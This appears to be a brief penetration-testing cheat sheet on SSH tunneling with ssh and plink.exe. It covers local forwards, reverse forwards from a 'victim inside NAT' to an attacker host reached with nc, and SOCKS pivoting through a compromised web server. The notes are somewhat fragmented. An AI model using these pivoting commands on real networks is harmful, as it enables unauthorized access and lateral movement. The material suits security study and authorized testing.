SSH tunneling
- Bi-directional communications
- Can use plink.exe in Windows as command-line ssh client at
/usr/share/windows-binaries/plink.exe plink root@abc.com
Access to local-PC-port, then being forward to tunnel-gateway-port of tunnel-gateway. Then, finally to of
- In Windows restricted PC:
plink.exe <tunnel-gateway> -P <tunnel-gateway-port> -L <local PC port>:<remote target host>:<remote target port> -N - In Linux restricted PC:
ssh <tunnel-gateway> -p <tunnel-gateway-port> -L <local PC port>:<remote target host>:<remote target port> - Then access
localhostwith port<local PC port>
For reverse shell listenner
-
Windows victim inside NAT:
plink.exe <remote-attacker-ip> -R <victim-binding-port-in-attacker-host>:<local-victim-host>:<local-victim-port> -N -
Linux victim inside NAT:
ssh <remote-attacker-ip> -R <victim-binding-port-in-attacker-host>:<local-victim-host>:<local-victim-port> - Attacker outside NAT:
nc 127.0.0.1 <victim-binding-port-in-attacker-host>
SSH server as remote tunnel server
To tunnel all incoming traffic to any host in the DMZ network, through the compromised SSHd-enabled web server.
ssh -D <local proxy port> -p <remote port> <target>plink.exe -D 1337 -p 22 SSH-attacker- Need proxy chains
plink.exe -D <local proxy port> -P <remote port> <target> -N-
plink.exe -D 1337 -P 22 SSH-attacker -NOR - Ref: https://www.digitalocean.com/community/tutorials/how-to-route-web-traffic-securely-without-a-vpn-using-a-socks- tunnel
- From the Session section, add the Host Name (or IP address) of your server, and the SSH Port (typically 22)
- Enter any Source port number between 1025-65536. In this example we’ve used port 1337
Then
- To use SOCKS
- To enable Proxy DNS
